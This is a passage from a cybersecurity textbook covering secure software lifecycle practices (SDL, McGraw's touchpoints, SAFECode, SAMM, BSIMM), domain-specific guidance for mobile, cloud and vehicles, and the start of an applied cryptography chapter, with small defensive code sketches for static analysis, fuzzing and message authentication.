the developer environment and be run by the developer during coding. Some SAST tools
spot certain implementation bugs, such as the use of unsafe or other banned functions,
and automatically replace them with (or suggest) safer alternatives as the developer
is actively coding. See also the Software Security Knowledge Area (Section 15.3.1).
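As a concrete illustration (not drawn from any of the cited processes), the following minimal sketch shows the kind of textual check such a tool performs: it scans C source files for calls to commonly banned functions and suggests safer replacements. The banned-function list and suggestions are illustrative assumptions; production SAST tools analyse parsed program representations rather than raw text.

```python
# Minimal sketch of a banned-function check, as a SAST tool might perform.
# The BANNED table is an illustrative assumption, not a complete policy.
import re
import sys

BANNED = {
    "strcpy": "strlcpy or strcpy_s",
    "strcat": "strlcat or strcat_s",
    "sprintf": "snprintf",
    "gets": "fgets",
}

def scan(path: str) -> int:
    """Report calls to banned functions in one C source file."""
    findings = 0
    pattern = re.compile(r"\b(" + "|".join(BANNED) + r")\s*\(")
    with open(path, encoding="utf-8", errors="replace") as f:
        for lineno, line in enumerate(f, start=1):
            for match in pattern.finditer(line):
                func = match.group(1)
                print(f"{path}:{lineno}: banned function '{func}' "
                      f"- consider {BANNED[func]}")
                findings += 1
    return findings

if __name__ == "__main__":
    total = sum(scan(path) for path in sys.argv[1:])
    sys.exit(1 if total else 0)   # non-zero exit can fail a check-in gate
```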
10. Perform Dynamic Analysis Security Testing (DAST). DAST performs run-time verifica-
tion of compiled or packaged software to check functionality that is only apparent when
all components are integrated and running. DAST often involves the use of a suite of
pre-built attacks and malformed strings that can detect memory corruption, user priv-
ilege issues, injection attacks, and other critical security problems. DAST tools may
employ fuzzing, an automated technique of inputting known invalid and unexpected test
cases at an application, often in large volume. Similar to SAST, DAST can be run by the
developer and/or integrated into the build and deployment pipeline as a check-in gate.
DAST can be considered to be automated penetration testing. See also the Software
Security Knowledge Area (Section 15.3.2).
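As a minimal illustration of the fuzzing technique described above (not taken from any cited tool), the sketch below mutates a seed input and feeds a large volume of malformed cases to a target; `parse_record` is a hypothetical function with a planted defect, included only to give the harness something to find.

```python
# Minimal sketch of mutation-based fuzzing. Everything here is illustrative.
import random

def parse_record(data: bytes) -> None:
    """Hypothetical target: a parser for 'key=value' records."""
    key, value = data.split(b"=", 1)   # raises ValueError on malformed input
    if b"\xff" in value:               # planted defect standing in for a real bug
        raise RuntimeError("simulated memory corruption")

def mutate(seed: bytes) -> bytes:
    """Overwrite a few random bytes of the seed input."""
    data = bytearray(seed)
    for _ in range(random.randint(1, 8)):
        data[random.randrange(len(data))] = random.randrange(256)
    return bytes(data)

seed = b"user=alice"
for i in range(10_000):
    case = mutate(seed)
    try:
        parse_record(case)
    except ValueError:
        pass                           # clean rejection: expected, not a bug
    except Exception as exc:           # any other failure is worth reporting
        print(f"case {i}: input {case!r} triggered {exc!r}")
```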
11. Perform Penetration Testing. Manual penetration testing is black box testing of a run-
ning system to simulate the actions of an attacker. Penetration testing is often performed
by skilled security professionals, who can be internal to an organisation or consultants,
opportunistically simulating the actions of a hacker. The objective of a penetration test
is to uncover any form of vulnerability - from small implementation bugs to major design
flaws - resulting from coding errors, system configuration faults or other operational
deployment weaknesses. Tests should attempt both unauthorised misuse of, and access
to, target assets and violations of the system's assumptions. A widely-referenced
resource for structuring penetration tests is the OWASP Top 10 Most Critical Web Ap-
plication Security Risks10 . As such, penetration testing can find the broadest variety of
vulnerabilities, although usually less efficiently compared with SAST and DAST [1585].
Penetration testers can be referred to as white hat hackers or ethical hackers. In the
penetrate-and-patch model, penetration testing was the only line of security analysis
prior to deploying a system.
12. Establish a Standard Incident Response Process. Despite a secure software lifecycle,
organisations must be prepared for inevitable attacks. Organisations should proactively
prepare an Incident Response Plan (IRP). The plan should identify whom to contact in
case of a security emergency and establish protocols for efficient vulnerability mitigation,
for customer response and communication, and for the rapid deployment of a fix. The
IRP should include plans for code inherited from other groups within the organisation
and for third-party code. The IRP should be tested before it is needed. Lessons learned
through responses to actual attacks should be factored back into the SDL.
10
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
17.2.1.2 Touchpoints
The international software security consultant Gary McGraw codified extensive industrial
experience with building secure products into seven Software Security Touchpoints [1578].
McGraw uses the term touchpoint to refer to software security best practices which can
be incorporated into a secure software lifecycle. McGraw differentiates vulnerabilities that
are implementation bugs and those that are design flaws [1583]. Implementation bugs are
localised errors, such as buffer overflows and input validation errors, in a single piece of
code, making them easier to spot and comprehend. Design flaws are systemic problems at the
design level of the code, such as error-handling and recovery systems that fail in an insecure
fashion or object-sharing systems that mistakenly include transitive trust issues [1578]. Kuhn
et al. [1598] analysed the 2008 - 2016 vulnerability data from the US National Vulnerability
Database (NVD)11 and found that 67% of the vulnerabilities were implementation bugs. The
seven touchpoints help to prevent and detect both bugs and flaws.
These seven touchpoints are described below in order of effectiveness, based upon
McGraw's experience of the utility of each practice over many years; the ordering is
hence prescriptive:
1. Code Review (Tools).
Code review is used to detect implementation bugs. Manual code review may be used,
but requires that the auditors are knowledgeable about security vulnerabilities before
they can rigorously examine the code. ’Code review with a tool’ (a.k.a. the use of static
analysis tools or SAST) has been shown to be effective and can be used by engineers
who do not have expert security knowledge. For further discussion on static analysis,
see Section 2.1.1 bullet 9.
2. Architectural Risk Analysis.
Architectural Risk Analysis, which can also be referred to as threat modelling (see Section
2.1.1 bullet 4), is used to prevent and detect design flaws. Designers and architects
provide a high-level view of the target system and documentation for assumptions, and
identify possible attacks. Through architectural risk analysis, security analysts uncover
and rank architectural and design flaws so mitigation can begin. For example, risk
analysis may identify a possible attack type, such as the ability for data to be intercepted
and read. This identification would prompt the designers to examine all of the code's traffic
flows to see whether interception was a concern and whether adequate protection (e.g.
encryption) was in place. The review that the analysis prompted is what uncovers design
flaws, such as sensitive data being transported in the clear.
No system can be perfectly secure, so risk analysis must be used to prioritise secu-
rity efforts and to link system-level concerns to probability and impact measures that
matter to the business building the software. Risk exposure is computed by multiply-
ing the probability of occurrence of an adverse event by the cost associated with that
event [1599].
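Expressed as a formula, with invented figures for illustration:

```latex
\text{Risk exposure} = P(\text{adverse event}) \times \text{Cost}(\text{adverse event})
```

For example, an event with an annual probability of 0.1 and a cost of £500,000 carries a risk exposure of £50,000 per year, and would be prioritised above an event with probability 0.5 and cost £20,000 (exposure £10,000 per year).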
McGraw proposes three basic steps for architectural risk analysis:
• Attack resistance analysis. Attack resistance analysis uses a checklist/systematic
approach of considering each system component relative to known threats, as is
done in Microsoft threat modelling discussed in Section 2.1.1 bullet 4. Information
11
http://nvd.nist.gov
about known attacks and attack patterns is used during the analysis to identify
risks in the architecture and to understand the viability of known attacks. Threat
modelling with the incorporation of STRIDE-based attacks, as discussed in Section
2.1.1 bullet 4, is an example process for performing attack resistance analysis.
• Ambiguity analysis. Ambiguity analysis is used to capture the creative activity re-
quired to discover new risks. Ambiguity analysis requires two or more experienced
analysts who carry out separate analysis activities in parallel on the same system.
Through unifying the understanding of the multiple analyses, disagreements between
the analysts can uncover ambiguity, inconsistency and new flaws.
• Weakness analysis. Weakness analysis is focused on understanding the risks related
to security issues in third-party components (see Section 2.1.1 bullet 7). The
idea is to understand the assumptions being made about third-party software and
what will happen when those assumptions fail.
Risk identification, ranking and mitigation is a continuous process throughout the software
lifecycle, beginning with the requirements phase.
3. Penetration Testing.
Penetration testing can be guided by the outcome of architectural risk analysis (see
Section 2.1.2 bullet 2). For further discussion on penetration testing, see Section 2.1.1,
bullet 11.
4. Risk-based Security Testing.
Security testing must encompass two strategies: (1) testing of security functionality with
standard functional testing techniques; and (2) risk-based testing based upon attack
patterns and architectural risk analysis results (see Section 2.1.2 bullet 2), and abuse
cases (see Section 2.1.2 bullet 5). For web applications, testing of security functionality
can be guided by the OWASP Application Security Verification Standard (ASVS) Project12,
an open standard for testing application technical security controls. ASVS also provides
developers with a list of requirements for secure development.
Guiding tests with knowledge of the software architecture and construction, common
attacks, and the attacker’s mindset is extremely important. Using the results of archi-
tectural risk analysis, the tester can properly focus on areas of code where an attack is
likely to succeed.
The difference between risk-based testing and penetration testing is the level of the
approach and the timing of the testing. Penetration testing is done when the software is
complete and installed in an operational environment. Penetration tests are outside-in,
black box tests. Risk-based security testing can begin before the software is complete
and even pre-integration, including the use of white box unit tests and stubs. The two are
similar in that they both should be guided by risk analysis, abuse cases and functional
security requirements.
5. Abuse Cases.
This touchpoint codifies ’thinking like an attacker’. Use cases describe the system's
desired behaviour when used by benevolent actors. Abuse cases [1586] describe the system’s
behaviour when under attack by a malicious actor. To develop abuse cases, an analyst
12
https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home
enumerates the types of malicious actors who would be motivated to attack the system.
For each bad actor, the analyst creates one or more abuse case(s) for the functionality the
bad actor desires from the system. The analyst then considers the interaction between
the use cases and the abuse cases to fortify the system. Consider an automobile
example. An actor is the driver of the car, and this actor has a use case ’drive the car’.
A malicious actor is a car thief whose abuse case is ’steal the car’. This abuse case
threatens the use case. To prevent the theft, a new use case ’lock the car’ can be added
to mitigate the abuse case and fortify the system.
Human error is responsible for a large number of breaches. System analysts should
also consider actions by benevolent users, such as being the victim of a phishing attack,
that result in a security breach. These actions can be considered misuse cases [1587]
and should be analysed similarly to abuse cases, considering what use case the misuse
case threatens and the fortification to the system to mitigate the misuse case.
The attacks and mitigations identified by the abuse and misuse case analysis can be
used as input into the security requirements (Section 2.1.1 bullet 2.); penetration testing
(Section 2.1.1 bullet 11); and risk-based security testing (Section 2.1.2 bullet 4).
6. Security Requirements.
For further discussion on security requirements, see Section 2.1.1 bullet 2.
7. Security Operations.
Network security can integrate with software security to enhance the security posture.
Inevitably, attacks will happen, regardless of the applications of the other touchpoints.
Understanding attacker behaviour and the software that enabled a successful attack is
an essential defensive technique. Knowledge gained by understanding attacks can be
fed back into the six other touchpoints.
The seven touchpoints are intended to be cycled through multiple times as the software
product evolves. The touchpoints are also process agnostic, meaning that the practices can
be included in any software development process.
17.2.1.3 SAFECode
The Software Assurance Forum for Excellence in Code (SAFECode)13 is a non-profit, global,
industry-led organisation dedicated to increasing trust in information and communications
technology products and services through the advancement of effective software assurance
methods. The SAFECode mission is to promote best practices for developing and delivering
more secure and reliable software, hardware and services. The SAFECode organisation pub-
lishes the ’Fundamental practices for secure software development: Essential elements of a
secure development lifecycle program’ [1600] guideline to foster the industry-wide adoption of
fundamental secure development practices. The fundamental practices deal with assurance
– the ability of the software to withstand attacks that attempt to exploit design or imple-
mentation errors. The eight fundamental practices outlined in their guideline are described
below:
1. Application Security Control Definition. SAFECode uses the term Application Security
Controls (ASC) to refer to security requirements (see Section 2.1.1 bullet 2). Similarly,
13
https://safecode.org/
NIST 800-53 [53] uses the phrase security control to refer to security functionality and
security assurance requirements.
The inputs to ASC include the following: secure design principles (see Section 2.1.3 bullet
3); secure coding practices; legal and industry requirements with which the application
needs to comply (such as HIPAA, PCI, GDPR, or SCADA); internal policies and standards;
incidents and other feedback; threats and risk. The development of ASC begins before
the design phase and continues throughout the lifecycle to provide clear and actionable
controls and to be responsive to changing business requirements and the ever-evolving
threat environment.
2. Design. Software must incorporate security features to comply with internal security
practices and external laws or regulations. Additionally, the software must resist known
threats based upon the operational environment (see Section 2.1.1 bullet 5). Threat
modelling (see Section 2.1.1 bullet 4), architectural reviews, and design reviews can be
used to identify and address design flaws before their implementation into source code.
The system design should incorporate an encryption strategy (see Section 2.1.1 bullet 6)
to protect sensitive data from unintended disclosure or alteration while the data are at
rest or in transit.
The system design should use a standardised approach to identity and access man-
agement to perform authentication and authorisation. The standardisation provides
consistency between components and clear guidance on how to verify the presence of
the proper controls. Authenticating the identity of a principal (be it a human user, other
service or logical component) and verifying the authorisation to perform an action are
foundational controls of the system. Several access control schemes have been devel-
oped to support authorisation: mandatory, discretionary, role-based or attribute-based.
Each of these has benefits and drawbacks and should be chosen based upon project
characteristics.
Log files provide the evidence needed for forensic analysis when a breach occurs and
help mitigate repudiation threats. In a well-designed application, system and security log files
provide the ability to understand an application’s behaviour and how it is used at any
moment, and to distinguish benevolent user behaviour from malicious user behaviour.
Because logging affects the available system resources, the logging system should be
designed to capture the critical information while not capturing excess data. Policies and
controls need to be established around the storage, tamper prevention and monitoring of log
files. OWASP provides valuable resources on designing and implementing logging14,15.
3. Secure Coding Practices. Unintended code-level vulnerabilities are introduced by pro-
grammer mistakes. These types of mistakes can be prevented and detected through the
use of coding standards; selecting the most appropriate (and safe) languages, frame-
works and libraries, including the use of their associated security features (see Section
2.1.1 bullet 8); using automated analysis tools (see Section 2.1.1 bullets 9 and 10); and
manually reviewing the code.
Organisations provide standards and guidelines for secure coding, for example:
(a) OWASP Secure Coding Practices, Quick Reference Guide 16
14
https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html
15
https://www.owasp.org/images/e/e0/OWASP_Logging_Guide.pdf
16
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Training will be needed (see Section 2.1.1 bullet 1). The specification of the organisation's
secure software lifecycle, including the roles and responsibilities, should be documented.
Plans for compliance and process health should be made (see Section 17.4).
[Figure: mapping of lifecycle phases to the practices of the three secure software lifecycle processes]

Education and awareness:
• Microsoft SDL: Provide training
• SAFECode: Planning the implementation and deployment of secure development

Analysis and requirements:
• Microsoft SDL: Define security requirements; Perform threat modelling
• Touchpoints: Abuse cases; Security requirements
• SAFECode: Application security control definition
17.3.2 Mobile
Security concerns for mobile apps differ from traditional desktop software in some important
ways, including local data storage, inter-app communication, proper usage of cryptographic
APIs and secure network communication. The OWASP Mobile Security Project [1605] is a
resource for developers and security teams to build and maintain secure mobile applications;
see also the Web & Mobile Security Knowledge Area (Chapter 16).
Four resources are provided to aid in the secure software lifecycle of mobile applications:
1. OWASP Mobile Application Security Verification Standard (MASVS) Security Require-
ments and Verification. The MASVS defines a mobile app security model and lists
generic security requirements for mobile apps. The MASVS can be used by architects,
developers, testers, security professionals, and consumers to define and understand
the qualities of a secure mobile app.
2. Mobile Security Testing Guide (MSTG). The guide25 is a comprehensive manual for
mobile application security testing and reverse engineering for iOS and Android mobile
security testers. The guide provides the following content:
(a) A general mobile application testing guide that contains a mobile app security test-
ing methodology and general vulnerability analysis techniques as they apply to
mobile app security. The guide also contains additional technical test cases that are
operating system independent, such as authentication and session management,
network communications, and cryptography.
(b) Operating system-dependent testing guides for mobile security testing on the An-
droid and iOS platforms, including security basics; security test cases; reverse
engineering techniques and prevention; and tampering techniques and prevention.
(c) Detailed test cases that map to the requirements in the MASVS.
3. Mobile App Security Checklist. The checklist26 is used for security assessments and
contains links to the MSTG test case for each requirement.
4. Mobile Threat Model. The threat model [1606] provides a checklist of items that should
be documented, reviewed and discussed when developing a mobile application. Five
areas are considered in the threat model:
(a) Mobile Application Architecture. The mobile application architecture describes
device-specific features used by the application, wireless transmission protocols,
data transmission medium, interaction with hardware components and other appli-
cations. The attack surface can be assessed through a mapping to the architecture.
(b) Mobile Data. This section of the threat model defines the data the application
stores, transmits and receives. The data flow diagrams should be reviewed to
determine exactly how data are handled and managed by the application.
(c) Threat Agent Identification. The threat agents are enumerated, including humans
and automated programs.
(d) Methods of Attack. The most common attacks utilised by threat agents are defined
so that controls can be developed to mitigate attacks.
25
https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide
26
https://github.com/OWASP/owasp-mstg/tree/master/Checklists
3. Trusted Compute Pools. Trusted Compute Pools are either physical or logical groupings
of compute resources/systems in a data centre that share a security posture. These
systems provide measured verification of the boot and runtime infrastructure, supporting
measured launch and trust verification. The measurements are stored in a trusted location
on the system (referred to as a Trusted Platform Module (TPM)) and verification occurs
when an agent, service or application requests the trust quote from the TPM. Practices:
(a) Ensure the platform for developing cloud applications provides trust measurement
capabilities and the APIs and services necessary for your applications to both
request and verify the measurements of the infrastructure they are running on.
(b) Verify the trust measurements as either part of the initialisation of your application
or as a separate function prior to launching the application.
(c) Audit the trust of the environments your applications run on using attestation
services or native attestation features from your infrastructure provider.
4. Data Encryption and Key Management. Encryption is the most pervasive means of
protecting sensitive data both at rest and in transit. When encryption is used, both
providers and tenants must ensure that the associated cryptographic key materials are
properly generated, managed and stored. Practices:
(a) When developing an application for the cloud, determine if cryptographic and key
management capabilities need to be directly implemented in the application or
if the application can leverage cryptographic and key management capabilities
provided by the PaaS environment.
(b) Make sure that appropriate key management capabilities are integrated into the
application to ensure continued access to data encryption keys, particularly as the
data move across cloud boundaries, such as enterprise to cloud or public to private
cloud.
5. Authentication and Identity Management. As an authentication consumer, the appli-
cation may need to authenticate itself to the PaaS to access interfaces and services
provided by the PaaS. As an authentication provider, the application may need to authen-
ticate the users of the application itself. Practices:
(a) Cloud application developers should implement the authentication methods and
credentials required for accessing PaaS interfaces and services.
(b) Cloud application developers need to implement appropriate authentication meth-
ods for their environments (private, hybrid or public).
(c) When developing cloud applications to be used by enterprise users, developers
should consider supporting Single Sign On (SSO) solutions.
6. Shared-Domain Issues. Several cloud providers offer domains that developers can use
to store user content, or for staging and testing their cloud applications. Such domains,
which may be used by multiple vendors, are considered ’shared domains’: because browsers
treat all content on a domain as a single origin, client-side script (such as JavaScript)
running on a shared domain may be able to read data belonging to other applications
hosted there. Practices:
(a) Ensure that your cloud applications are using custom domains whenever the cloud
provider’s architecture allows you to do so.
(b) Review your source code for any references to shared domains.
The European Union Agency for Cybersecurity (ENISA) [1609] conducted an in-depth and
independent analysis of the information security benefits and key security risks of cloud
computing. The analysis reports that the massive concentrations of resources and data in the
cloud present a more attractive target to attackers, but cloud-based defences can be more
robust, scalable and cost-effective.
3. The automotive industry should document the details related to its cyber security
process, including the results of risk assessment, penetration testing and the organisa-
tion's decisions related to cyber security. Essential documents, such as cyber security
requirements, should follow a robust version control protocol.
4. These security requirements should be incorporated into the product's security require-
ments, as laid out in Section 2.1.1 bullet 2, Section 2.1.2 bullet 6, and Section 2.1.3 bullet
1:
(a) Limit developer/debugging access to production devices, such as through an open
debugging port or through a serial console.
(b) Keys (e.g., cryptographic) and passwords which can provide an unauthorised, el-
evated level of access to vehicle computing platforms should be protected from
disclosure. Keys should not provide access to multiple vehicles.
(c) Diagnostic features should be limited to a specific mode of vehicle operation
which accomplishes the intended purpose of the associated feature. For example,
a diagnostic operation which may disable a vehicle’s individual brakes could be
restricted to operating only at low speeds or not disabling all the brakes at the same
time.
(d) Encryption should be considered as a useful tool in preventing the unauthorised
recovery and analysis of firmware.
(e) Limit the ability to modify firmware and/or employ signing techniques to make it
more challenging for malware to be installed on vehicles.
(f) The use of network servers on vehicle ECUs should be limited to essential func-
tionality, and services over these ports should be protected to prevent use by
unauthorised parties.
(g) Logical and physical isolation techniques should be used to separate processors,
vehicle networks, and external connections as appropriate to limit and control
pathways from external threat vectors to cyber-physical features of vehicles.
(h) Sending safety signals as messages on common data buses should be avoided; where
this is unavoidable, a message authentication scheme should be employed to limit the
possibility of message spoofing (a sketch of such a scheme follows this list).
(i) An immutable log of events sufficient to enable forensic analysis should be main-
tained and periodically scrutinised by qualified maintenance personnel to detect
trends of cyber-attack.
(j) Encryption methods should be employed in any IP-based operational communi-
cation between external servers and the vehicle, and should not accept invalid
certificates.
(k) Plan for and design in features that could allow changes in network routing
rules to be quickly propagated and applied to one, a subset or all vehicles.
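As a sketch of the message authentication scheme suggested in item (h), a sender can bind each safety signal to a freshness counter and a truncated MAC computed under a key shared with the receivers (AUTOSAR's SecOC specification standardises a comparable truncated-MAC-plus-freshness design). All sizes, field layouts and the key-provisioning shortcut below are illustrative assumptions.

```python
# Sketch of authenticating a safety signal on a shared vehicle bus:
# HMAC over the message identifier, a freshness counter and the payload,
# truncated to fit the limited frame size. Illustrative only.
import hmac
import hashlib

KEY = bytes(16)      # placeholder; real keys are provisioned per vehicle
counter = 0          # freshness value, shared with receivers, prevents replay

def protect(msg_id: int, signal: bytes) -> bytes:
    global counter
    counter += 1
    authed = msg_id.to_bytes(4, "big") + counter.to_bytes(4, "big") + signal
    tag = hmac.new(KEY, authed, hashlib.sha256).digest()[:4]  # truncated MAC
    return counter.to_bytes(4, "big") + signal + tag          # frame payload

frame = protect(0x123, b"\x01")   # e.g. a one-byte brake signal
```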
The International Organization for Standardization (ISO)34 and SAE International35
(formerly the Society of Automotive Engineers) are jointly developing an international standard, ISO 21434
34
https://www.iso.org/standard/70918.html
35
www.sae.org
Road vehicles - cyber security engineering36 . The standard will specify minimum requirements
on security engineering processes and activities, and will define criteria for assessment.
Explicitly, the goal is to provide a structured process to ensure cyber security is designed in
upfront and integrated throughout the lifecycle process for both hardware and software.
The adoption of a secure software lifecycle in the automotive industry may be driven by
legislation, such as through the US SPY Car Act37 or China and Germany’s Intelligent and
Connected Vehicles (ICVs) initiative38 .
17.4.1 SAMM
The Software Assurance Maturity Model (SAMM)40 is an open framework to help organisations
formulate and implement a strategy for software security that is tailored to the specific risks
facing the organisation. Resources are provided for the SAMM to enable an organisation to
do the following:
1. Define and measure security-related activities within an organisation.
2. Evaluate their existing software security practices.
3. Build a balanced software security program in well-defined iterations.
4. Demonstrate improvements in a security assurance program.
Because each organisation utilises its own secure software process (i.e., its own unique
combination of the practices laid out in Sections 2 and 3), the SAMM provides a framework to
describe software security initiatives in a common way. The SAMM designers enumerated
activities executed by organisations in support of their software security efforts. Some ex-
ample activities include: build and maintain abuse case models per project; specify security
requirements based upon known risks; and identify the software attack surface. These activi-
ties are categorised into one of 12 security practices. The 12 security practices are further
grouped into one of four business functions. The business functions and security practices
are as follows:
1. Business Function: Governance
(a) Strategy and metrics
(b) Policy and compliance
(c) Education and guidance
2. Business Function: Construction
(a) Threat assessment
(b) Security requirements
(c) Secure architecture
3. Business Function: Verification
(a) Design review
(b) Code review
(c) Security testing
40
https://www.opensamm.org/ and https://www.owasp.org/images/6/6f/SAMM_Core_V1-5_FINAL.pdf
17.4.2 BSIMM
Gary McGraw, Sammy Migues, and Brian Chess desired to create a descriptive model of the
state of the practice in secure software development lifecycles. As a result, they forked an early
version of SAMM (see Section 4.1) to create the original structure of the Building Security In
Maturity Model (BSIMM) [1612, 1613] in 2009. Since that time, the BSIMM has been used to
structure a multi-year empirical study of the current state of software security initiatives in
industry.
Because each organisation utilises its own secure software process (i.e., its own unique
combination of the practices laid out in Sections 2 and 3), the BSIMM provides a framework
to describe software security initiatives in a common way. Based upon their observations,
the BSIMM designers enumerated 113 activities executed by organisations in support of
their software security efforts. Some example activities include: build and publish security
features; use automated tools along with a manual review; and integrate black-box security
tools into the quality assurance process. Each activity is associated with a maturity level and
is categorised into one of 12 practices. The 12 practices are further grouped into one of four
domains. The domains and practices are as follows:
1. Domain: Governance
(a) Strategy and metrics
(b) Compliance and policy
(c) Training
2. Domain: Intelligence
(a) Attack models
(b) Security features and design
(c) Standards and requirements
DISCUSSION
This chapter has provided an overview of three prominent and prescriptive secure software
lifecycle processes and six adaptations of these processes that can be applied in a specified
domain. However, the cybersecurity landscape in terms of threats, vulnerabilities, tools and
practices is ever evolving. For example, a practice that has not been mentioned in any of
these nine processes is the use of a bug bounty program for the identification and resolution
of vulnerabilities. With a bug bounty program, organisations compensate individuals and/or
of vulnerabilities. With a bug bounty program, organisations compensate individuals and/or
researchers for finding and reporting vulnerabilities. These individuals are external to the
organisation producing the software and may work independently or through a bug bounty
organisation, such as HackerOne42 .
While the majority of this knowledge area focuses on technical practices, the successful
adoption of these practices involves organisational and cultural changes in an organisation.
The organisation, starting from executive leadership, must support the extra training, resources,
and steps needed to use a secure development lifecycle. Additionally, every developer must
uphold his or her responsibility to take part in such a process.
A team and an organisation need to choose the appropriate software security practices to de-
velop a customised secure software lifecycle based upon team and technology characteristics
and upon the security risk of the product.
While this chapter has provided practices for developing secure products, information
insecurity is often due to economic disincentives [1615], which drive software organisations
to choose the rapid deployment and release of functionality over the production of secure
products. As a result, governments and industry groups are increasingly imposing cyber
security standards on organisations as a matter of legal compliance or as a condition for
being considered as a vendor. Compliance requirements may lead to faster adoption of a
secure development lifecycle. However, this compliance-driven adoption may divert efforts
away from the real security issues by driving an over-focus on compliance requirements rather
than on the pragmatic prevention and detection of the most risky security concerns.
42
https://www.hackerone.com
CROSS-REFERENCE OF TOPICS VS REFERENCE MATERIAL

[Table mapping the chapter's topics against the reference material [1600], [1469], [1572] and [1577]; c1–c3 denote the relevant chapters of those references:]

17.1 Motivation: c1, c1, c1
17.2 Prescriptive Secure Software Lifecycle Processes
17.2.1 Secure Software Lifecycle Processes: c2, c2, c2, c2
17.2.2 Comparing the Secure Software Lifecycle Models
17.3 Adaptations of the Secure Software Lifecycle
17.3.1 Agile Software Development and DevOps: c3
17.3.2 Mobile
17.3.3 Cloud Computing
17.3.4 Internet of Things (IoT)
17.3.5 Road Vehicles
17.3.6 ECommerce/Payment Card Industry
17.4 Assessing the Secure Software Lifecycle
17.5 Adopting a Secure Software Lifecycle
FURTHER READING
Building Secure Software: How to Avoid Security Problems the Right Way
[1469]
This book introduces the term software security as an engineering discipline for building
security into a product. This book provides essential lessons and expert techniques for
security professionals who understand the role of software in security problems and for
software developers who want to build secure code. The book also discusses risk assessment,
developing security tests, and plugging security holes before software is shipped.
Security controls
Government and standards organisations have provided security controls to be integrated
into a secure software or systems lifecycle:
1. The Trustworthy Software Foundation46 provides the Trustworthy Software Frame-
work (TSFr)47, a collection of good practice, existing guidance and relevant standards
across the five main facets of trustworthiness: Safety; Reliability; Availability; Resilience;
and Security. The purpose of the TSFr is to provide a minimum set of controls such that,
when applied, all software (irrespective of implementation constraints) can be specified,
realised and used in a trustworthy manner.
2. The US National Institute of Standards and Technology (NIST) has authored the Sys-
tems Security Engineering: Cyber Resiliency Considerations for the Engineering of
Trustworthy Secure Systems framework (NIST SP 800-160) [1617]. This framework
provides guidance for achieving identified cyber resiliency outcomes based on a
systems engineering perspective on system life cycle processes.
3. The Software Engineering Institute (SEI) has collaborated with professional organisa-
tions, industry partners and institutions of higher learning to develop freely-available
curricula and educational materials. Included in these materials are resources for a
software assurance program48 to train professionals to build security and correct func-
tionality into software and systems.
4. The UK National Cyber Security Centre (NCSC)49 provides resources for secure software
development:
45
https://www.owasp.org/
46
https://tsfdn.org
47
https://tsfdn.org/ts-framework/
48
https://www.sei.cmu.edu/education-outreach/curricula/software-assurance/index.cfm
49
https://www.ncsc.gov.uk/
Training materials
Training materials are freely-available on the Internet. Some sites include the following:
1. The Trustworthy Software Foundation provides a resource library53 of awareness mate-
rials and guidance targeted for those who teach trustworthy software principles, those
who seek to learn about Trustworthy Software and those who want to ensure that the
software they use is trustworthy. The resources available include a mixture of documents,
videos, animations and case studies.
2. The US National Institute of Standards and Technology (NIST) has created the NICE
Cybersecurity Workforce Framework [1618]. This framework provides resources on
cyber security Knowledge, Skills and Abilities (KSAs), and tasks for a number of work
roles.
3. The Software Engineering Institute (SEI) has collaborated with professional organisa-
tions, industry partners and institutions of higher learning to develop freely-available
curricula and educational materials. Included in these materials are resources for a
software assurance program54 to train professionals to build security and correct func-
tionality into software and systems.
4. SAFECode offers free software security training courses delivered via on-demand web-
casts55 .
50
https://www.ncsc.gov.uk/collection/application-development
51
https://www.ncsc.gov.uk/collection/developers-collection
52
https://www.ncsc.gov.uk/blog-post/leaky-pipe-secure-coding
53
https://tsfdn.org/resource-library/
54
https://www.sei.cmu.edu/education-outreach/curricula/software-assurance/index.cfm
55
https://safecode.org/training/
Chapter 18
Applied Cryptography
Kenneth G. Paterson, ETH Zürich
INTRODUCTION
This document provides a broad introduction to the field of cryptography, focusing on ap-
plied aspects of the subject. It complements the Cryptography Knowledge Area (Chapter 10)
which focuses on formal aspects of cryptography (including definitions and proofs) and on
describing the core cryptographic primitives. That said, formal aspects are highly relevant
when considering applied cryptography. As we shall see, they are increasingly important when
it comes to providing security assurance for real-world deployments of cryptography.
The overall presentation assumes a basic knowledge of either first-year undergraduate mathe-
matics, or that found in a discrete mathematics course of an undergraduate Computer Science
degree. Good cryptography textbooks that cover the required material include [963, 1619, 1620].
We begin by informally laying out the key themes that we will explore in the remainder of the
document.
Cryptography is a Mongrel
Cryptography draws from a number of fields including mathematics, theoretical computer
science and software and hardware engineering. For example, the security of many public key
algorithms depends on the hardness of mathematical problems which come from number
theory, a venerable branch of mathematics. At the same time, to securely and efficiently
implement such algorithms across a variety of computing platforms requires a solid under-
standing of the engineering aspects. To make these algorithms safely usable by practitioners,
one should also draw on usability and Application Programming Interface (API) design. This
broad base has several consequences. Firstly, almost no-one understands all aspects of the
field perfectly (including the present author). Secondly, this breadth creates gaps — between theory
and practice, between design and implementation (typically in the form of a cryptographic
library, a collection of algorithm and protocol implementations in a specific programming
language) and between implementations and their eventual use by potentially non-expert
developers. Thirdly, these gaps lead to security vulnerabilities. In fact, it is rare that standard-
ised, widely-deployed cryptographic algorithms directly fail when they are properly used. It is
more common that cryptography fails for indirect reasons — through unintentional misuse
of a library API by a developer, on account of bad key management, because of improper
combination of basic cryptographic algorithms in a more complex system, or due to some
form of side-channel leakage. All of these topics will be discussed in more detail.
Cryptography ≠ Encryption
In the popular imagination cryptography equates to encryption; a cryptographic mechanism
providing confidentiality services. In reality, cryptography goes far beyond this to provide an
underpinning technology for building security services more broadly. Thus, secure communi-
cations protocols like Transport Layer Security (TLS) rely on both encryption mechanisms
(Authenticated Encryption, AE) and integrity mechanisms (e.g. digital signature schemes) to
achieve their security goals. In fact, in its most recent incarnation (version 1.3), TLS relies
exclusively on Diffie-Hellman key exchange to establish the keying material that it consumes,
whereas earlier versions allowed the use of public key encryption for this task. We will discuss
TLS more extensively in Section 18.5; here the point is that, already in the literally classic
application of cryptography, encryption is only one of many techniques used.
Moreover, since the boom in public research in cryptography starting in the late 1970s, re-
searchers have been incredibly fecund in inventing new types of cryptography to solve seem-
ingly impossible tasks. Whilst many of these new cryptographic gadgets were initially of purely
theoretical interest, the combination of Moore’s law and the growth of technologies such as
cloud computing has made some of them increasingly important in practice. Researchers
have developed some of these primitives to the point where they are efficient enough to be
